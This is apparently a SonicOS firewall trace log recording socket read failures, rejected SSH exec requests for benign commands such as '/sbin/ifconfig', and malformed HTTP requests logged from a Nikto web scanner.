02/15 12:39:31.528: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/15 12:39:32.864: fatal - Read from socket failed: errno = 0x3a, connection_in 50
02/15 12:39:35.528: fatal - Read from socket failed: errno = 0x3a, connection_in 53
02/15 12:39:36.336: fatal - Read from socket failed: errno = 0x3a, connection_in 52
02/15 12:53:08.224: fatal - Read from socket failed: errno = 0x36, connection_in 46
02/15 13:10:40.720: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/15 13:24:09.896: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/15 13:24:27.544: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/15 13:46:39.544: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/15 15:17:00.112: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
showed 1043 log events
log core 01: num exceptions 0, state events logged 0, missed 0 - critical events logged 0, missed 0
log core 02: num exceptions 0, state events logged 0, missed 0 - critical events logged 2, missed 0
-------critial (non-wrapping) log:
02/10 12:38:00.432: CRITICAL - DP2: Informational: getHTTPCommandFromPkt:9639: 
02/10 12:38:00.432: CRITICAL - unexpected HTTP command "get / HTTP/1.1
User-Agent: Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000445)
Host: ec2-54-152-109-199.compute-1.amazonaws.com
Connection: Keep-Alive

??s?

??"
showed 2 log events
log core 03: num exceptions 0, state events logged 0, missed 0 - critical events logged 4, missed 0
-------critial (non-wrapping) log:
02/10 16:22:41.496: CRITICAL - DP3: Informational: getHTTPCommandFromPkt:9639: 
02/10 16:22:41.496: CRITICAL - unexpected HTTP command "get / HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000445)
Host: ec2-54-152-109-199.compute-1.amazonaws.com

???

??"
02/12 16:49:57.016: CRITICAL - DP3: Informational: getHTTPCommandFromPkt:9639: 
02/12 16:49:57.016: CRITICAL - unexpected HTTP command "get / HTTP/1.1
User-Agent: Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000445)
Connection: Keep-Alive
Host: ec2-54-152-109-199.compute-1.amazonaws.com

?>?q

?>"
showed 4 log events
log core 04: num exceptions 0, state events logged 0, missed 0 - critical events logged 2, missed 0
-------critial (non-wrapping) log:
02/12 16:51:37.576: CRITICAL - DP4: Informational: getHTTPCommandFromPkt:9639: 
02/12 16:51:37.576: CRITICAL - unexpected HTTP command "get / HTTP/1.1
User-Agent: Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000445)
Connection: Keep-Alive
Host: ec2-54-152-109-199.compute-1.amazonaws.com

j??

j?"
showed 2 log events
log core 05: num exceptions 0, state events logged 0, missed 0 - critical events logged 0, missed 0
<end of trace log>